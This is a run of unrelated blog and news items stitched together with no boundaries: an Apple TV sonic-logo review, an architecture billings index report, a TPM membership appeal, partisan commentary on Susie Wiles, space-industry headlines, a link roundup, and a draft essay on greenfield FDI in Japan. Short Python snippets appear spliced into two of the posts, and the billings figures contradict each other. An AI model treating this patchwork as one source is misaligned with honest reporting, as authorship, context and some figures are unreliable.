I held off on posting about this new Apple TV fanfare (a.k.a. sonic logo, a.k.a. mnemonic) until I’d experienced it a few times, and after a few weeks, watching a bunch of episodes from a few Apple TV series — Mr. Scorsese, a 5-star five-part documentary by Rebecca Miller, absolutely riveting; Pluribus, Vince Gilligan’s excellent new the-less-you-know-about-it-before-you-start-watching-the-better series starring Rhea Seehorn; and The Morning Show season 4, a series that’s skirting just above the good-enough-to-keep-watching line for me — I’m willing to render a verdict.

I love it.

The old one was not bad. But “not bad” should never be good enough for Apple. I can’t find anyone from Apple stating so explicitly, but it seems pretty obvious that the piano chord accompanying the old fanfare was meant to evoke the Macintosh startup chime. That’s a neat idea. And no one is more a fan of the Macintosh than me. I’d argue that the Mac remains the definitive Apple product, the one that best exemplifies everything the company does and should stand for. So harking back to the Macintosh was an interesting idea for the Apple TV fanfare/sonic logo/mnemonic.

But: it just wasn’t great. What makes that chord great for a computer booting up doesn’t make it great for a cinematic sonic logo. Netflix’s “tudum” is so iconic that it’s the name of their company blog. HBO’s static + chanted om is the OG standard-setter. I suspect the new Apple TV fanfare will be seen in that class. The old one was not.

The new one feels like a branding stroke unto itself. Sonically, it doesn’t evoke anything else. It just sounds rich and cool. Visually, with its rotating prism effect, it does evoke the classic six-color Apple logo. Thus, despite moving away from a sonic callback to the Macintosh, the overall effect feels more rooted to Apple’s on-the-cusp-of-a-half-century history. The change makes Apple TV original content feel more like a part of Apple, less like a possible passing fancy (which is what many in Hollywood fear).

That prism effect was created practically. From a LinkedIn post from Apple’s longtime agency partner TBWA Media Arts Lab (no clue why they posted this on LinkedIn, of all places):

Built from real glass and captured entirely in camera, the new identity explores reflection, color, and light to express the cinematic spirit at the heart of Apple TV. Every shimmer was made for real, no CG shortcuts, a nod to Apple’s belief that craft should be felt, not faked.

The work spans the entire platform, from a sharp five-second show open to a full-length cinematic version for films, paired with a new sonic logo composed by Oscar winner Finneas and a custom typeface, SF TV, developed with Apple’s design team.

They include a very short video showing behind the scenes of its creation. It matters not to me that they photographed this practically, rather than via computer-generated graphics, but the bottom line is that it looks cool, timeless, and Apple-y.

Chris Willman at Variety has an interview with Finneas (O’Connell) regarding the music:

Mnemonic, Finneas says, “is sort of a beautiful word for a logo” accompanied by sound. “The things that I think of as real classic mnemonics are NBC — you can hear that in your head — or HBO has its static.” Finneas is well aware of how modern streaming consumption might make this especially ubiquitous, household by household. “If you’re binge-ing the whole season of Ted Lasso or Severance or Disclaimer” (the last of those being the limited series that he composed the score for himself), “you’re going to hear the mnemonic 10 times in one day. So it’s gotta be something that’s like the bite of ginger between rolls or something, you know?”

See and hear for yourself. Here’s the old Apple TV mnemonic:

Here’s the new 5-second version, shown at the beginning of each episode of Apple TV original series:

And here’s the full 12-second version, shown before Apple Original Films:

Bravo.

AIA: "Architecture firm billings remain stagnant" in November

Note: This index is a leading indicator primarily for new Commercial Real Estate (CRE) investment including multi-family residential.

From the AIA: Architecture firm billings remained soft in November
The AIA/Deltek Architecture Billings Index (ABI) score for the month remained well below the 50 level at 45.3 (a score over 50 indicates billings growth). This marked the 13th consecutive month of declining billings at architecture firms, and the 35th month of a score below 50 out of the last 38. Inquiries into new projects only increased modestly this month, and the value of newly signed design contracts continued to soften. Until work in the pipeline starts to pick back up, firms are unlikely to see a significant increase in their billings.

While business conditions at architecture firms have been soft in most sectors this year, the Midwest remained a bright spot in November. Billings increased at firms located in that region for the third consecutive month, and more firms reported growth this month than last month. However, billings continued to decline at firms located in all other regions of the country, particularly at firms located in the Northeast and the West. Firms of all specializations also saw billings continue to contract in November, although fewer firms with multifamily residential and institutional specializations reported declines than last month.
...
The ABI serves as a leading economic indicator that leads nonresidential construction activity by approximately 9-12 months.
emphasis added
• Regional averages: Northeast (43.1); Midwest (52.3); South (46.1); West (43.6)

• Sector index breakdown: commercial/industrial (45.2); institutional (47.6); multifamily residential (46.6)

AIA Architecture Billings Index

This graph shows the Architecture Billings Index since 1996. The index was at 45.3 in November, down from 47.6 in October.  Anything below 50 indicates a decrease in demand for architects' services.
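To make the "below 50 means contraction" rule concrete, here is a minimal sketch of how a diffusion index of this kind is typically constructed: the share of surveyed firms reporting growth plus half the share reporting no change. Whether AIA/Deltek uses exactly this weighting is an assumption, and the firm counts below are made up for illustration.

```python
def diffusion_index(up, flat, down):
    """Generic diffusion index: percent of firms reporting growth
    plus half the percent reporting no change. A value of 50 means
    no net change; below 50 means more firms shrinking than growing."""
    total = up + flat + down
    return 100.0 * (up + 0.5 * flat) / total

# Hypothetical survey of 100 firms: 30 report higher billings,
# 31 report no change, 39 report lower billings.
print(diffusion_index(30, 31, 39))  # 45.5 -- net contraction
```

Under this construction, readings in the mid-40s, like November's 45.3, indicate a persistent but not severe contraction: the balance of firms is shrinking, though not by a landslide.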

This index has indicated contraction for 36 of the last 38 months.

Note: This includes commercial and industrial facilities like hotels and office buildings, multi-family residential, as well as schools, hospitals and other institutions.

This index usually leads CRE investment by 9 to 12 months, so this index suggests a slowdown in CRE investment throughout 2026.

Multi-family billings have been below 50 for 40 consecutive months. This suggests we will see some further weakness in multi-family starts.

Join Us In This Super Fun Thing!

As the year winds down, we have a fun little project I want to pitch you on. It’s a key, incremental part of keeping TPM strong, vital and moving forward into the new year and beyond. Right now, we are 279 subscriptions short of a net increase of 3,000 subscribers for the year. True, this is not a bumper-sticker ready declaration. But it’s an important one. We want and need to keep growing like that as we move forward and the 3,000 net new members is a big milestone. So if you’ve been thinking about subscribing, please consider doing it before the new year.

And here’s the incentive. We have a supply of high-end TPM t-shirts and baseball caps from TPM’s 25th anniversary. This isn’t your standard made-on-demand online merch stuff. This is high end, plush, well made. I’m not saying it’s quite Louis Vuitton. But if you went to the campus bookstore at your alma mater and thought of getting a sweatshirt or something, it’d be that level of quality. If you are a non-member and you sign up for a TPM AF (ad free) annual membership we will give you a choice of either a T-shirt or a cap. This is while supplies last. We’ll update each day to tell you what we have left. If you are currently a TPM Prime member and you upgrade to ad free, we will make the same offer. Just to be super clear, we cannot do this for a regular TPM Prime membership. This does not mean that we don’t want you to sign up or that we’re not super grateful, but these are pricey and we are trying to offer these as an additional incentive. (I’ll note how to claim your merch below.) Mainly, the reason to do this is to join our community and support our team’s work. People are often amazed that this little organization remains when so many other bigger ones, richer ones, hotter ones, have fallen by the wayside. This is why. We have this community who wants to be part of what we do and support what we do for the relatively small cost of a subscription. Click here to join right now.

______

INSTRUCTIONS: If you sign up for a new TPM PRIME AF (ad free) annual membership, here’s what you do to claim your merch. Sign up or upgrade to the new membership. You’ll get a receipt by email. Someone at TPM will then follow up later (that day or the next) by email to get the details about your merch preferences and where to send it. That’s it. As I said, we will do this while supplies last and we are making the offer through this week. We will update on the Editor’s Blog if we run out of merch by the end of the week.

‘Trump’s Totally My Bitch!’ and Other Wild Quotes From Susie Wiles

Our bespoke piñata of the day is the Susie Wiles piece in Vanity Fair (they must be excited to move on from Olivia …) We’re seeing the standard incantations of “fake news” from none other than Wiles herself. Trump’s Cabinet secretaries have all lined up to post tweets repeating the claim, intoning the Trump-Wiles catechism as though they’d just emerged from a fast-forward struggle session with a pack of feral MAGA toughs. I’ve started making my way through the morselly excerpts, as perhaps you have too. What struck me here was perhaps not even so much the quotes as the venue.

Few American publications are more at the heart of the cosmopolitan world of America than Vanity Fair. That is not the same thing as liberal; small-c cosmopolitan is different but overlapping. But it is perhaps even more than “liberal” what MAGA is talking about when it denounces the “coastal elite.” Certainly they’re talking more about that than, like, People for the American Way or Americans for Democratic Action or Heather Cox Richardson. Susie Wiles is no fool. And while she may — as in a very low de minimis chance — have gotten a touch injudicious in a few quotes, she certainly knew with perfect clarity what Vanity Fair is.

And this makes me wonder a few things. The rallying around the flag has been rapid and total. Just goddamn absolute. Perhaps we’ll see some hemorrhaging over the coming days. But I doubt it. And to me that means that Wiles has total confidence in her position, either because her hold over Trump is that secure (which I think it is) or because it is secure in part due to his increasingly clear enervation (which I think is at least part of the equation).

To make clear what I mean, there’s the channel of her personal security, which there’s every reason to believe is very, very strong. And there’s Trump’s personal enervation, the slow loss of coherence and synaptic fragmentation we see both in his personal conduct and in the slackening reins of power around him.

To illustrate the first channel, it’s difficult to overstate how important Wiles is for Trump. Do you remember the last Susie Wiles drama or death watch? No. Because it’s simply never happened. No one ever stays long with Trump, but she goes way back into his period in exile as his indispensable person. (She worked for Trump in less central positions going back to 2015.) I suspect she was a big part of the relative stability of his reelection campaign, or whatever counts as stability relative to how much crazier things might have been without her. I’m not saying anything new. This is a throughline in almost all the reporting on Trump since his darkest (for him) days after 2021. In a way, she became the person who could make the trains of chaos run on time. I think it is mostly that, or largely that. But I also don’t think we can separate it from that process of enervation we all see before our eyes.

But note also the other big element in these quotes released by the Vanity Fair PR machine.

If I’m not mistaken, Wiles seems to have tried to warn Trump off of his wildest and most malevolent actions. She tried. And she wants us to know she tried. Indeed, the second point is probably more certain and significant than the first. But he decided to do them anyway. And that’s fine. Because he’s the boss. But no one else but Wiles seems to have these rights written into her deal. She can tell us all about it, tell us the things all of us know, but from within the MAGA politburo and on the record. She’s no Beria. She’s no Malenkov. She’s untouchable. Or at least that’s what it looks like right now. This whole thing seems like, if not a declaration of independence, then one of untouchability on her part. Trump’s my bitch. I can touch the MAGA third rail and suffer no harm.

Rocket Lab set to launch Space Force and NASA ‘DiskSat’ experiment

The STP-S30 mission will test flat, disk-shaped smallsat design for sustained operations in very low orbit

The post Rocket Lab set to launch Space Force and NASA ‘DiskSat’ experiment appeared first on SpaceNews.

Digantara raises $50 million to expand from space surveillance to missile defense

Digantara Industries mission control center

Digantara Industries, an Indian space situational awareness company, has raised $50 million as it expands into the United States and pursues opportunities in missile defense.


Speed, risk, and the future of national security space

Spacepower innovation panel

In this episode of Space Minds, host Mike Gruss moderates a timely panel discussion at the Spacepower conference on how commercial space capabilities are reshaping national security, civil space, and military decision-making.


Max Space unveils plans for commercial space station

Thunderbird Station

Max Space, a startup developing expandable module technologies, plans to build a commercial space station that could launch on a single Falcon 9 rocket.


What Germany got right (and wrong) in its first ever space strategy

A photo of Europe taken by German astronaut Alexander Gerst. Credit: ESA/A.Gerst, CC BY-SA 3.0 IGO

Germany’s first national space security strategy was unveiled last month to much fanfare. And who’s surprised? It was long overdue, and puts into plain language a simple but vital truth: space is now a theatre of power. With Russia and China long having treated orbit as contested territory, and the United States preparing daily for […]


Ariane 6 launches Galileo navigation satellites

Ariane 6 launch

An Ariane 6 rocket placed two satellites for Europe’s Galileo navigation system into orbit Dec. 17.


OQ Technology links commercial IoT chipset to LEO satellite

Luxembourg-based OQ Technology said Dec. 17 it has connected a commercial IoT chipset directly to one of its LEO satellites, using internally developed software based on 3GPP mobile standards.


Lux Aeterna to land first reusable satellite in Australia

Denver-based Lux Aeterna announced plans Dec. 17 to land its debut reusable satellite at the Koonibba Test Range in South Australia, shortly after launching on a SpaceX rideshare mission in early 2027.


Wednesday assorted links

1. A listener ranks CWT episodes from this year.

2. A game-theoretic model of AI arms races.

3. Haitian gangs update.

4. GDP is underrated.

5. The economics of Jeffrey Epstein (NYT).

6. “The US Tech Force is recruiting an elite corps of engineers to build the next generation of government technology.”  Here is the web site.

7. Breakthroughs of the year.

8. Norman Podhoretz, RIP.

The post Wednesday assorted links appeared first on Marginal REVOLUTION.

       


 

FDI is the missing piece of Japan’s puzzle

Photo by Sanjo via Wikimedia Commons

My book, Weeb Economy, came out in March, but only in Japanese. Half of the book was a series of translated posts from my blog, so those are already in English. The other half was a new part that I wrote in English and had translated into Japanese by my excellent translator, Kataoka Hirohito. So while I’ll eventually republish the whole book in English, what I can do right now is to publish my English-language first draft as a series of posts on this blog.

The first installment was entitled “I Want the Japanese Future Back!”. In that post, I explained why Japan now finds itself in the position of a developing country, playing catch-up with other countries. This means Japan needs to experiment with bold new strategies and development models, as it did in ages past.

In this second installment, I suggest one such experiment: a huge increase in a kind of investment called greenfield FDI. I discuss:

  • How Japan is already benefitting from greenfield FDI in a few places

  • Why greenfield FDI (a foreign company building a factory or research center in Japan) is so much more important and useful than other kinds of FDI like mergers and acquisitions

  • Why Japan needs to export a lot more to other countries, and how greenfield FDI can help do that

  • How Japan can start to welcome more greenfield FDI

  • Why Japan is an attractive destination for international investment

The Kumamoto miracle points the way

The semiconductor industry is probably the most important industry in the world. Computer chips are absolutely essential to every high-value product in a modern economy — autos, rockets, appliances, machinery, everything. They’re also of crucial military importance, in an age where precision weaponry rules the battlefield. And they’re of core importance to emerging technologies like AI — whose vast computational resources require enormous data centers — and biotech.

As a result, it’s no wonder that the world’s major economies have been fighting over the semiconductor industry for generations. In the early days, the U.S. and Japan were the clear leaders. Much of the industry involves the design of semiconductors and the production of specialized tools and materials, and in these upstream parts of the industry the U.S. and Japan are still strong. But in the most important downstream part of the process — the actual fabrication of the most advanced chips — both the U.S. and Japan have lost their lead to Taiwan:

Source: Statista

Specifically, they have lost their lead to one remarkable Taiwanese company: Taiwan Semiconductor Manufacturing Company. TSMC is essentially the world’s greatest machinist. Other companies design the chips, and other companies create the (incredibly advanced) machine tools that make the chips. What TSMC does is buy the tools, then use them with incredible ingenuity and efficiency to turn someone else’s chip designs into reality. The company pioneered this “pure-play foundry” business model, which has made it rich and has allowed Taiwan to outcompete the chipmaking industries of every other country on the planet.

Since the pandemic, the global battle to win semiconductor market share has intensified, due to the advent of AI and to the geopolitical competition between China and the democratic countries. Japan, like many countries, is trying to build its own foundry business, in the form of Rapidus, a joint venture between a number of Japanese companies that’s also getting some help from IBM. But, as in the U.S., there’s also a second, parallel effort afoot: TSMC is building chips in Japan.

In late 2021, TSMC created a Japanese subsidiary called Japan Advanced Semiconductor Manufacturing (JASM), and started building two fabs in Kumamoto prefecture. Sony and Denso pitched in to help. So did the Japanese government, providing billions of dollars in subsidies and offering TSMC logistical assistance in finding local workers and ensuring adequate water and other infrastructure. The first plant was completed very quickly, and opened in February 2024; the second is expected to open in 2025. Now TSMC is considering a third fab in Kumamoto, producing even more advanced chips, to be opened in 2030.

Observers have been impressed with the speed with which the fab was built, comparing it favorably to TSMC’s plant in America, which initially suffered delays. TSMC credited the successful construction to a variety of local supporting institutions — “suppliers, customers, business partners, government and academia.” TSMC’s founder Morris Chang, who once poked fun at Japan for the slow speed of its business dealings, has now become a true believer in the revival of the country’s chip industry. At the opening of the first TSMC plant in Kumamoto, Chang predicted a “renaissance of semiconductors” in Japan.

And Japan isn’t stopping with TSMC. Micron, an American chip company, is building a fab in Hiroshima, bringing some of its best technology into the country. Samsung is building a semiconductor development center in Yokohama. Both of these investments are being done with significant help from the Japanese government, and involve cooperation with Japanese companies and universities.

These investments by foreign companies aren’t Japan’s only strategy for reviving its semiconductor industry — they coexist alongside homegrown efforts like Rapidus, as well as Japan’s upstream efforts in the chipmaking tool and materials industries. But they represent a crucial addition to the purely indigenous efforts. This is an example of multi-strategy development at work.

But it’s far from the only such example.

A school of AI fish

The artificial intelligence boom is the most important trend in the software industry right now. Whether this will still be true in future years remains to be seen, of course, but the capabilities of large language models like ChatGPT, AI art software like Midjourney, and computer vision systems are undeniable. Even if there’s a bubble and bust in the field at some point — as there was with dot-com companies in 2000 — AI is going to be important in the long term.

Japan largely missed out on the internet software boom — the country has no internationally dominant consumer internet giants like Google or Facebook, and its B2B software industry was hampered by Japanese companies’ slowness to adopt IT solutions in past decades. But the AI age is a new dawn, and Japan has another shot at building a powerful software industry.

At the time of this writing, one of the most interesting AI startups in Japan is Sakana AI. Currently, AI applications generally use one large statistical model to generate text, create images, recognize objects, predict the shape of a protein, and so on. Sakana instead tries to use groups of smaller models to accomplish the same thing. In addition to being able to do some things better than big models, these groups of smaller models may use much less electric power — an important consideration at a time when AI’s energy needs are skyrocketing.
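To give a flavor of the general idea of pooling small models rather than relying on one large one, here is a minimal sketch using simple majority voting. This is purely illustrative (the models below are hypothetical toy callables); Sakana’s actual techniques are more sophisticated and are not described here.

```python
from collections import Counter

def ensemble_predict(models, x):
    """Pool several small models by majority vote instead of
    asking one large model. Each model is any callable that
    maps an input to a discrete label."""
    votes = [m(x) for m in models]
    return Counter(votes).most_common(1)[0][0]

# Toy stand-ins for small models (purely hypothetical):
# two parity checkers and one model that always answers 0.
models = [lambda x: x % 2, lambda x: x % 2, lambda x: 0]
print(ensemble_predict(models, 3))  # 1 -- the majority wins
```

The appeal of this kind of design is that each small model can be cheap to run, and mistakes by any single model can be outvoted by the rest.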

Sakana AI has three founders. There’s Llion Jones, originally from Wales, who was one of the authors of the groundbreaking 2017 research paper that discovered the algorithm now used to make LLMs. There’s David Ha, originally from Canada, who was an AI researcher at Google Brain. And there’s Ito Ren, a Japanese former diplomat who was an executive at the e-commerce company Mercari.

The company’s investors are equally international: they include American venture capital firms like Khosla Ventures, Lux Capital, and New Enterprise Associates; the American semiconductor giant Nvidia; and a large assortment of Japanese banks and technology companies. Sakana’s most recent funding round raised $214 million and valued the company at $1.5 billion.

That’s not a huge valuation compared to U.S. giants like OpenAI ($150 billion) or Anthropic (possible valuation of $40 billion). But Sakana’s presence has put Japan on the map as a potential hotspot for international AI investment. Nvidia, for example, has declared its intention to create an R&D center in Japan. OpenAI has opened a branch office in Tokyo. Oracle is investing $8 billion over the next decade in AI and cloud computing in Japan. This is in addition, of course, to all the big cloud providers — Amazon, Microsoft, and Google — looking to invest in Japan in order to serve the Japanese market.

Then there’s Spellbrush, a U.S. startup that has a partnership with the AI art and design company Midjourney. Spellbrush uses generative AI to create Japanese-style anime art — one of the most popular and lucrative applications for AI so far. Spellbrush recently opened a branch office in Tokyo’s Akihabara neighborhood.

Japan is still behind the U.S. and China in AI, but investments like these keep it in the game.

It’s important to note that although Sakana AI might succeed, the most likely outcome is that the company will fail. This is true because most startups fail in general, and because in a rapidly changing new industry like AI, the failure rate is likely to be even higher. In fact, the entire AI industry may be headed for a significant bust, like the dot-com crash in 2000.

But this shouldn’t negate the importance of Sakana, or of the Japanese AI boom in general. First of all, though most startups fail, the few that succeed often grow very large and important — venture investing is about accepting many failures in order to find a few huge wins. The investment and attention that Sakana draws to the Japanese AI startup scene will help make sure that some of those successes happen in Japan. Even a general AI bust will likely be only a temporary setback for the industry, as with the dot-com crash and the subsequent recovery.

Second, even failed startups often contribute crucial innovation to a country’s ecosystem. Fairchild Semiconductor wasn’t successful, but it pushed the envelope of semiconductor technology forward, and some of its alumni went on to found Intel. General Magic tried and failed to invent the smartphone in the 1990s, but its alumni went on to help create the iPhone.

And third, Sakana sends a signal that Japan is a viable destination for international investment in the software industry in general, well beyond AI. Japan is generally weak in most areas of IT, including B2B solutions, consumer internet companies, and cloud computing providers. As in semiconductors, a wave of foreign entrepreneurs and foreign funding could help Japan shore up its weak spot in software.

The most important kind of FDI

The chipmaking projects by TSMC, Micron, and Samsung, the U.S. VCs’ investment in Sakana AI, and the branch offices of companies like OpenAI are all examples of foreign direct investment, or FDI. But they’re not the only type, and when people talk about FDI, they often mean something very different. In fact, it’s actually a bit of a confusing term, because it encompasses multiple unrelated categories of investment. FDI includes:

  • Cross-border real estate purchases

  • Acquiring a foreign company (M&A)

  • Building a branch office or factory in a foreign country (“greenfield” investment)

Most writers who advocate for Japan to increase FDI focus on the second of these. They believe that allowing more foreign acquisition of Japanese companies will improve these companies’ productivity by transferring foreign management techniques.

I am agnostic concerning this argument. I recognize that Japan’s policymakers and businesses have many reasons for resisting foreign acquisitions, both as part of the country’s development strategy and as part of its social policy. Foreign buyers might downsize Japanese companies by firing large numbers of employees, which would hurt Japan’s corporation-centric social welfare model. They might strip-mine Japanese companies for their technology or other assets and then sell them off as husks of their former selves, as happens all too often with leveraged buyouts in the United States. Or they might simply neglect their Japanese acquisitions until they stagnate.

Instead, my argument is that Japan should focus specifically on increasing and promoting greenfield FDI — foreign companies building their own branch offices and factories in Japan. And in particular, Japan should encourage greenfield platform FDI, in which a foreign company builds factories or offices in Japan in order to create goods and services that are then exported from Japan to a third country. TSMC’s chip fabs in Kumamoto are an example of greenfield platform FDI.

This particular kind of FDI offers a lot of benefits that foreign takeovers don’t. For one thing, greenfield FDI usually directly adds to the economy — when a foreign company builds a factory in Japan, or even just purchases office equipment for a new office, that represents real money that goes directly into Japanese people’s pockets. And greenfield FDI inevitably results in the hiring of more Japanese workers, since someone has to work at the new factory or office branch.

Investment spending and workers’ salaries in turn stimulate the surrounding local economy — already, Kumamoto is experiencing an economic boom. Note that M&A doesn’t necessarily accomplish any of this — it just changes ownership of existing businesses, without requiring any new investment, hiring, or spending on the local economy.

And greenfield FDI is also more likely to be received warmly by the Japanese public. Ito, Tanaka, and Jinji (2023) find that Japanese people feel more positively about greenfield FDI than about foreign acquisitions:

This study empirically examines the determinants of individuals’ attitudes about inward foreign direct investment (FDI) using responses from questionnaire surveys that were originally designed. Individuals’ preferences for inward FDI differ between greenfield investments and mergers and acquisitions (M&A), and people are more likely to have a negative attitude toward M&A than greenfield investments. People with a negative image of the so-called “vulture fund” for foreign capital tend to oppose inward FDI, and this is more pronounced for M&A than greenfield investments.

On top of all this, greenfield platform FDI has a very good economic track record. It has been key to the economic success of a number of developing countries — most notably China, but also Poland and Malaysia.

After China’s entry into the World Trade Organization in 2001, companies from around the world flocked there to set up factories — both to sell their products to a billion newly available Chinese consumers, and to exploit what at the time were cheap Chinese labor, land, energy, and capital costs in order to make products for export to the rest of the world. This latter strategy is known as “platform FDI”.

Poland executed a similar strategy on a smaller scale, becoming a factory floor for European nations — especially Germany — looking for lower costs and more friendly regulation. Malaysia became a center of electronics manufacturing, with investments from the U.S., Singapore, Japan, and elsewhere. In both of these cases, the products of foreign-owned factories were largely sold abroad, since both Poland and Malaysia have relatively small domestic markets. FDI thus helped to make China, Poland, and Malaysia into export powerhouses.

Japan, of course, is in a very different economic situation than China, Poland, or Malaysia were in the 2000s. But it can still learn from their successes. In addition to the direct benefits for investment and employment, greenfield platform FDI offers two main advantages: it can increase a country’s exports, while also facilitating technology transfer. In its current economic situation, Japan could use a whole lot of both of these things.

Japan needs exports

Americans often think of Japan as an export powerhouse, because of the international success of brands like Toyota, Honda, Sony, and Panasonic. And during the early days of the postwar miracle, Japan’s bureaucracy did strongly encourage exports, in order to earn precious foreign currency. But in fact, this lingering stereotype is badly mistaken — Japan has never really been an export-oriented economy like Germany or South Korea. It’s a domestically focused economy, more like the United States:

Source: World Bank

As Chalmers Johnson recounts in MITI and the Japanese Miracle, this inward focus was part of Japan’s development model in the 1960s. MITI found that ensuring cheap bank loans to domestic companies, and promoting competition in the domestic market, was a way to quickly boost Japan’s investment rate and its capital stock. And they found that this approach also ensured an adequate level of exports, since Japanese companies would produce more than they could sell in the domestic market, and export the excess capacity overseas.

Now, Japan finds itself badly in need of exports. The first reason is that exports help increase the value of the yen, making Japanese people richer as a result.

Japan’s currency has weakened dramatically against the dollar and other world currencies. This is partly because of Japan’s low interest rates relative to other rich countries, which is driven by Japan’s low inflation (and probably by a need to keep Japanese government borrowing costs low, in order to make Japan’s very large government debt sustainable).

As a result of the weak yen, Japanese people are finding it increasingly difficult to afford imports. Japan imports most of its food and energy, so the weak yen is increasing the cost of daily life. Japanese companies are having trouble importing the parts and materials they need, as well as energy. The Japanese government has been forced to intervene to prop up the value of the yen. But such interventions can’t last forever, since they require selling off foreign assets — eventually, the government runs out of foreign assets to sell, and the currency crashes even more.

An increase in global demand for Japanese exports can help increase the value of the yen. This is because in order to buy Japanese goods and services, foreigners need to swap their currencies for yen. This increases the demand for the yen, which pushes up its value. The more exports Japan sells, the stronger the yen becomes. Ultimately, Japan’s currency problem probably can’t be fixed by exports alone — financial outflows will have to be addressed as well. But exports help.

The second reason for Japan to focus on exports is that the domestic Japanese market is shrinking. Japan’s population is forecast to fall substantially over the remainder of this century:

Mass immigration may slow this trend, and measures to increase the birth rate may eventually manage to reverse it. But whether that will ever happen is unknown, and even if it does, Japan will not be a major growth market for a long while. This means there is much less incentive for companies — Japanese or foreign — to invest in Japan in order to serve the domestic market than in the past. Less investment also means less spending on R&D, which causes Japan to fall behind technologically.

Exporting can help reduce this problem, or even solve it. The more Japan becomes an attractive platform for export production, the more reason there is for Japanese companies and foreign companies to invest in Japan, including investments in R&D and new technologies. This will help increase productivity.

Finally, the activities required to increase exports may improve productivity. There’s a lot of research on “learning by exporting” — entering foreign markets could teach Japanese engineers, product designers, and managers how to produce things that foreigners want to buy. This could help counter the so-called “Galapagos syndrome” — the tendency of Japanese product standards to drift away from international standards, shrinking the markets available to Japanese companies.

Another way to put this is that exporting allows companies based in Japan — whether domestically owned or foreign-owned — to achieve scale without exacerbating the domestic competition that drives down prices.

Greenfield platform FDI — like TSMC’s fabs in Kumamoto or American venture capitalists’ investment in AI startups in Tokyo — can help Japan become more of an export powerhouse. Okubo, Wagner, and Yamada (2017) find that foreign-owned factories in Japan tend to export more — and also to innovate more. Their explanations for the difference have to do with corporate governance and culture, and with the pool of employees that foreign-owned companies are able to hire. They write:

Foreign ownership may play a role in risk-taking choices of companies – such as exporting and innovating – for various reasons. It can provide companies with more information about the outside market, especially in the context of small and medium enterprises. Foreign owners may be keen on getting high returns on investment and may tolerate a higher risk level. Firms with foreign ownership may have greater access to funds. Also, firms that do allow foreign ownership may experience a more open corporate culture than firms that do not, and such open culture may facilitate risk-taking.

The simplest explanation here is that multinational companies — especially those with foreign employees — simply know a lot more about global markets. TSMC knows what kind of computer chips Nvidia and Apple want to buy. Sakana AI’s founders keep in touch with the American AI market, and understand what kind of capabilities U.S. companies want from AI models. And so on.

In other words, greenfield platform FDI is a perfect example of multi-strategy development. It means that instead of coming into Japan to compete with local companies in the Japanese market, foreign companies are helping Japan sell a bunch of new products to a bunch of new overseas customers.

The intangible benefits of FDI

Japan’s low levels of productivity are something of a mystery to researchers. Nakamura, Kaihatsu, and Yagi (2018), a trio of researchers from the Bank of Japan, arrive at the frustrating conclusion that the biggest problem is a lack of “intangible assets” at Japanese companies. These are any non-physical assets — brand reputation, patents, software, long-term customer relationships, management know-how, worker skills, tacit technical know-how, and so on.

This is such an enormously broad and heterogeneous category, and so many of its components are hard to measure, that “intangible assets” basically ends up becoming a label for economists’ ignorance about what makes some companies more valuable than others. For example, Nakamura et al. note that Japanese companies spend quite a lot on R&D, but don’t seem to get nearly as much value for their spending as U.S. companies do.

So the mystery remains a mystery. But even if we don’t quite know what the most important intangible assets are, we still might be able to help companies get more of them. Nakamura et al. suggest a fairly standard list of approaches — increasing labor mobility, improving corporate governance, allowing more lagging companies to fail, and improving the venture capital ecosystem. These are all reasonable, and — as we saw above — they’re all things that Japan is already trying to a greater or lesser degree.

But there’s one strategy that seems to be flying a bit under the radar here: FDI. When foreign companies put their factories, offices, and research centers in Japan, they bring many intangible assets with them — foreign management techniques, technical tricks and know-how, connections to customers and suppliers in other countries, and so on. And these can, for the most part, be pretty easily transferred to Japanese companies.

One way, which has been thoroughly documented by researchers, is through interactions with local suppliers. When a company like TSMC puts a semiconductor fab in Japan, one reason is so that it can buy a bunch of specialized tools and components from Japanese suppliers — like the photoresist that Japanese companies are so famous for. This in turn teaches Japanese suppliers what the leading chip companies need and how to best serve them, as well as details about how the best chipmaking tools work. Both kinds of knowledge are intangible assets.

Another way ideas spread is through job-switching. TSMC’s fab is going to employ a bunch of Japanese workers. Those workers are going to get the chance to learn how to make chips from the very best in the business. If some of them eventually leave to go work at Japanese semiconductor companies, they’ll take all that knowledge with them. This sort of knowledge transfer would have been harder in the old days, when Japan was still under the lifetime employment system. But now, with mid-career hiring on the rise, it’s very likely.

Let’s imagine an example of how this might work. Suppose you’re a Japanese AI researcher at a domestic AI startup. You and your team know a lot about AI models, from reading research papers, from building them yourself, and maybe from going to some conferences overseas. But for some reason your models aren’t quite as good as foreign companies’ models. The foreigners must have a bunch of little tricks they use to make things work better.

Then one day your company hires another researcher who worked at Sakana AI. Your new colleague knows a lot of those tips and tricks for making models work more smoothly, from having worked with some of the top researchers at Sakana. And their time at Sakana also gave them personal connections with a bunch of other researchers overseas, whom you can now call up and ask for help solving your model’s problems.

Congratulations! You’ve just transferred tacit knowledge for free. Your company’s intangible assets have increased.

If this example sounds contrived, consider how many of Japan’s most famous inventions came through interaction with foreigners and absorption of foreign knowledge. Japan’s Canon cooperated with America’s Hewlett Packard in the 1980s to create laser printers. Yamaha created the digital synthesizer with the help of a Stanford engineer named John Chowning. The famous inventor Sasaki Tadashi licensed American patents to help him invent the first commercially viable pocket calculator.

Those are all examples from the book We Were Burning. In other words, in the 20th century, close links between Japan and the U.S. created a vibrant international research community, where ideas flowed back and forth across borders and across companies.

In fact, there’s evidence that this is a consistent pattern when it comes to FDI. Todo (2006) and Kozo (2006) both find that FDI consistently leads to positive productivity spillovers to the country that receives the investment, and that these spillovers are closely related to R&D spending.

Observers of the Japanese economy have noted with dismay how it seems to be losing human contact with other developed economies. Few Japanese people study abroad these days, and those that do tend to go only for a very short period of time. The number of Japanese young people who want to work abroad has diminished. Collaboration between Japanese scientists and their foreign counterparts has decreased, contributing to a decline in Japan’s high-quality research output. Even as the international research community has grown larger, Japan has been pulling away from it.

Greenfield FDI can help counter that increasing insularity, by bringing foreign researchers and managers into Japan, where Japanese people can absorb their knowledge without leaving the country.

Japan is welcoming the right kind of FDI, but it can do more

Why has greenfield FDI in Japan traditionally been very small? In the early days of its postwar miracle, Japan restricted all kinds of FDI for protectionist reasons, in order to reserve the domestic market for Japanese companies that were still in their early growth stages. This was a typical policy for the time, and not dissimilar from the “infant industry” protections used by the U.S. in its early development.

